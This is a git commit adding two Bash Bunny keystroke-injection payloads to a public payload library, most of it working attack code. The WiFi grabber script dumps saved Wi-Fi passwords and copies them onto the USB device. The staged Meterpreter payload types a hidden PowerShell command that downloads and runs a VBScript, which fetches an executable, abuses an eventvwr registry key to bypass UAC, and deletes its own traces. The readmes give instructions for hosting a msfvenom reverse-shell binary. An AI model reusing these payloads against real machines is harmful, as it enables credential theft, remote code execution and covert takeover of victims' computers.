Added WindowsMeterpreterStaged and WiFiGrabber payloads (#85)

* added wifi grabber and windows meterpreter staged payload * created details and updated content of payloads - ready for publication to hak5 bash bunny scripts * created details and updated content of payloads - ready for publication to hak5 bash bunny scripts * Added a rename file * added the rename file
2017-04-07 08:10:54 +01:00 · 2017-04-07 08:10:54 +01:00 · c5510c9daa
parent 9deb63d268
commit c5510c9daa
7 changed files with 248 additions and 0 deletions
--- a/payloads/library/WifiGrabber/ducky_script.txt
+++ b/payloads/library/WifiGrabber/ducky_script.txt
@ -0,0 +1,69 @@
 REM Title: WiFi password grabber for the bash bunny
 REM Author: Silvian
 REM Props: Siem, Darren Kitchen
 REM Version: 1
 REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt
 DELAY 1000
 GUI r
 DELAY 1000
 STRING powershell Start-Process cmd -Verb runAs
 ENTER
 DELAY 2000
 LEFT
 DELAY 1000
 ENTER
 DELAY 1000
 REM Delete registry keys storing Run dialog history
 STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
 ENTER
 REM --> Getting SSID
 STRING cd "%TEMP%" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
 ENTER
 REM --> Creating A.txt
 STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
 ENTER
 REM --> Get network type
 STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
 ENTER
 REM --> Get authentication
 STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
 ENTER
 REM --> Get password
 STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
 ENTER
 REM --> Delete A.txt
 STRING del A.txt
 ENTER
 REM --> Create Log.txt
 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
 ENTER
 REM Creates directory compromised of computer name, date and time
 REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
 STRING for /f %D in ('wmic volume get DriveLetter^, Label ^| find "BashBunny"') do set usb=%D
 ENTER
 DELAY 200
 ENTER
 REM Create directory on the bash bunny as wifi creds and computer name and date time stamp
 STRING set dst=%usb%\loot\WiFi_Creds\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
 ENTER
 DELAY 200
 ENTER
 STRING mkdir %dst% >>nul
 ENTER
 REM Move the Log.txt to the created directory on the bash bunny
 STRING move Log.txt %dst% >>nul
 ENTER
 DELAY 100
 STRING exit
 ENTER
--- a/payloads/library/WifiGrabber/payload.txt
+++ b/payloads/library/WifiGrabber/payload.txt
@ -0,0 +1,38 @@
 #!/bin/bash
 # @title: WiFi Windows password grabber for the bash bunny
 # @author: Silvian Dragan
 # @props: Siem, Darren Kitchen
 # @version: 1.0
 # @target: Windows 7 (not tested for 8 and above)
 #
 #
 # @details: This is a simple Wifi password grabber tested and working for Windows 7
 # However this has not been tested on Windows 8 and above and any suggestions and
 # improvements are greatly welcomed. Powershell scripting isn't higest skill so
 # I'm sure I'll have much to learn.
 #
 #
 # Colors:
 #         Purple: starts the attack payload
 #         Green: successful execution
 #         Red: failure to load dependency ducky script
 #
 ATTACKMODE HID STORAGE
 LED R B 200
 LANGUAGE=‘us’
 source bunny_helpers.sh
 if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
        QUACK ${SWITCH_POSITION}/ducky_script.txt
        LED G
 else
    LED R
    echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
        exit 1
 fi
--- a/payloads/library/WifiGrabber/readme.md
+++ b/payloads/library/WifiGrabber/readme.md
@ -0,0 +1,24 @@
 # Windows Wifi Credentials Grabber
 * Author: Silvian
 * Version: Version 1.0
 * Target: Windows 7 (not tested on Windows 8 and above)
 ## Description
 This is a simple Wifi password grabber tested and working for Windows 7
 However this has not been tested on Windows 8 and above and any suggestions and
 improvements are greatly welcomed. Powershell scripting isn't higest skill so
 I'm sure I'll have much to learn from sharing this code with everyone. :)
 ## Dependencies
 Everything is included - no extra dependencies needed to run this payload.
 ## STATUS
 | LED                | Status                                       |
 | ------------------ | -------------------------------------------- |
 | Purple             | Starts the attack payload                    |
 | Green              | successful execution                         |
 | Red                | failure to load dependency ducky script      |
--- a/payloads/library/WindowsMeterpreterStaged/payload.txt
+++ b/payloads/library/WindowsMeterpreterStaged/payload.txt
@ -0,0 +1,48 @@
 #!/bin/bash
 #
 # @title: Bash bunny Windows staged meterpreter payload
 # @author: Silvian Dragan
 # @props: Darren Kitchen, Mubix
 # @version: 1.0
 # @target: Windows 7 8, 8.1 and 10.
 #
 #
 # @details: This is an a advanced meterpreter staged payload injection using the
 # rubber ducky capabilites of the bash bunny to call a powershell script referred
 # to sc.txt which must be hosted on a remote server.
 # This script then downloads the update.exe which is also hosted on
 # a remote host, and then executes it on the target machine.
 # note it will also attempt to clean up any registry footprint from the run command.
 # Once the bash bunny is initialized the script should not take more than
 # 2-3 sec to execute.
 #
 # @Dependencies: you must have sc.txt and update.exe hosted on a remote server.
 # replace the 127.0.0.1 with your own host and also feel free to change the name
 # of either sc.txt or update.exe to names of your choosing.
 # You must also generate the appropariate update.exe payload using msfvenom for
 # windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
 # tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
 #
 # Colors:
 #         Amber: starts the attack payload
 #         Green: successful execution
 #         Red: failure to load dependency ducky script
 #
 ATTACKMODE HID
 LED R G 200
 LANGUAGE='us'
 source bunny_helpers.sh
 if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
        QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
        LED G
 else
    LED R
    echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
        exit 1
 fi
--- a/payloads/library/WindowsMeterpreterStaged/readme.md
+++ b/payloads/library/WindowsMeterpreterStaged/readme.md
@ -0,0 +1,32 @@
 # Windows Meterpreter staged payload
 * Author: Silvian
 * Version: Version 1.0
 * Target: Windows 7, 8, 8.1, 10
 ## Description
 This is an a advanced meterpreter staged payload injection using the
 rubber ducky capabilites of the bash bunny to call a powershell script referred
 to sc.txt which must be hosted on a remote server.
 This script then downloads the update.exe which is also hosted on
 a remote host, and then executes it on the target machine.
 Note it will also attempt to clean up any registry footprint from the run command.
 Once the bash bunny is initialized the script should not take more than 2-3 sec to execute.
 ## Dependencies
 you must have sc.txt and update.exe hosted on a remote server.
 replace the 127.0.0.1 with your own host and also feel free to change the name
 of either sc.txt or update.exe to names of your choosing.
 You must also generate the appropariate update.exe payload using msfvenom for
 windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
 tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
 ## STATUS
 | LED                | Status                                       |
 | ------------------ | -------------------------------------------- |
 | Amber              | Executin Payload                             |
 | Green              | Attack Finished                              |
 | Red                | Failed to load dependencies                  |
--- a/payloads/library/WindowsMeterpreterStaged/sc.txt
+++ b/payloads/library/WindowsMeterpreterStaged/sc.txt
@ -0,0 +1,30 @@
 Sub Main()
 	'Download File
 	CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND http://127.0.0.1/update.exe %temp%/update.exe"),0,true
 	'Set new zoneId
 	CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\update.exe:ZONE.identifier"),0,true
 	'Write UAC bypass regkey
 	CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\update.exe" ,"REG_SZ"
 	'Trigger UAC bypass
 	CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
 	'Reset regkey
 	GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
 	'Remove this script
 	CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
 End Sub
 'Dont wanna display shit
 On Error Resume Next
  Main
  If Err.Number Then
     'on error cleanup and exit
 	CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
     WScript.Quit 4711
 End If
--- a/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt
+++ b/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt
@ -0,0 +1,7 @@
 REM change 127.0.0.1 to the IP address or host name of your own host service
 DELAY 1000
 GUI r
 DELAY 100
 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/sc.txt', '%temp%/update.vbs'); %temp%/update.vbs
 ENTER